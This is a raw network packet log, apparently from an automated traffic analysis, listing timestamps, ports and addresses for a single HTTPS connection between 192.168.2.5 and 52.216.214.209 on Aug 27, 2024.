                                                Aug 27, 2024 12:55:17.671224117 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.671247959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.671283007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.671920061 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.671936035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.671977997 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.671984911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.672008038 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.672092915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.672416925 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.672437906 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.672523022 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.672532082 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.672547102 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.672583103 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.672923088 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.672938108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.673003912 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.673011065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.673049927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.673049927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.703047991 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.703063965 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.703133106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.703144073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.703201056 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.757312059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.757332087 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.757399082 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.757411003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.757448912 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.757448912 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.757908106 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.757922888 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.757992983 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758004904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758017063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758089066 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758491993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758507013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758579016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758586884 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758641958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758893967 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758908033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.758955956 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.758961916 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.759001017 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.759001017 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.759466887 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.759480953 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.759541988 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.759548903 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.759587049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.759587049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.760123014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.760138035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.760188103 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.760216951 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.760224104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.760251999 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.760322094 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.790862083 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.790877104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.790954113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.790966034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.833760977 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.844927073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.844944000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.845029116 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.845041037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.845087051 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.845459938 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.845473051 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.845546007 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.845554113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.845627069 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.846268892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846282005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846385956 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.846398115 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846416950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.846442938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.846761942 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846775055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846844912 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.846853018 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.846894979 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.847202063 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.847215891 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.847296953 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.847305059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.847356081 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.848011971 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.848026037 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.848059893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.848089933 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.848092079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.848110914 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.848125935 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.848169088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.878474951 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.878498077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.878611088 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.878621101 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.927480936 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.934485912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.934508085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.934596062 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.934607029 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.934760094 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.935170889 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.935188055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.935278893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.935286999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.935332060 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.936202049 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.936217070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.936352968 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.936362982 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.936446905 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.936903000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.936918020 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.936983109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.936990976 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.937066078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.937514067 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.937532902 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.937598944 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.937606096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.937655926 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.938054085 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938069105 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938137054 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.938144922 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938297033 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.938689947 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938704014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938774109 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.938781023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.938838959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.966056108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.966070890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.966164112 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.966164112 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:17.966175079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:17.966260910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020297050 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020312071 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020373106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020385027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020442963 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020442963 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020816088 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020832062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020916939 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020916939 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.020925999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.020973921 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.021517038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.021533966 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.021615028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.021625042 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.021671057 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.022012949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022033930 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022084951 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.022093058 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022130013 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.022141933 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.022629023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022643089 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022708893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.022716045 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.022768974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023286104 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023300886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023386955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023535967 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023541927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023581982 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023793936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023812056 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023865938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023876905 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.023906946 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.023942947 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.053780079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.053797007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.053890944 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.053905010 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.053992033 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.107968092 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.107986927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.108069897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.108082056 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.108177900 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.108499050 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.108515024 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.108606100 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.108613968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.108649969 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.108688116 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.109076023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109091043 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109147072 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.109154940 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109220028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.109563112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109576941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109668016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.109668016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.109677076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.109909058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.110019922 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.110033989 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.110095978 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.110105038 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.110158920 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.110739946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.110754013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.110841990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.110850096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.111001968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.111021996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.111021996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.111036062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.111059904 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.111138105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.141181946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.141199112 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.141258955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.141267061 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.141304016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.141316891 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196059942 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196077108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196136951 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196180105 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196187973 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196219921 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196239948 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196243048 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196252108 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196290016 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196347952 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196799040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196814060 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.196902037 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.196909904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197009087 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.197369099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197382927 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197458029 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.197465897 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197540045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.197793007 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197807074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197885990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.197894096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.197931051 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.198225975 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.198240042 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.198311090 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.198322058 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.198365927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.199084044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.199099064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.199199915 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.199208021 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.199259996 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.228703976 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.228719950 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.228790045 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.228800058 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.228853941 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.283747911 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.283771992 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.283854961 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.283865929 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.283905983 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.283943892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.283958912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.284001112 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.284007072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.284032106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.284092903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.284826040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.284846067 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.284894943 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.284902096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.284924984 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.284962893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285304070 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285317898 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285461903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285461903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285470009 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285532951 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285778999 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285793066 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285845995 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285851955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.285887957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.285903931 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.286541939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286557913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286598921 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.286603928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286617041 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286643982 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.286649942 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286672115 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.286678076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.286712885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.286714077 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.319089890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.319104910 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.319175959 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.319185972 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.319273949 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.371984005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372000933 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372087955 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.372096062 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372155905 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.372364044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372379065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372454882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.372462034 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.372849941 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.373007059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373022079 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373101950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.373110056 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373241901 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.373634100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373646975 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373724937 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.373732090 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.373792887 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.373990059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374002934 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.374062061 CEST49707443192.168.2.552.216.214.209
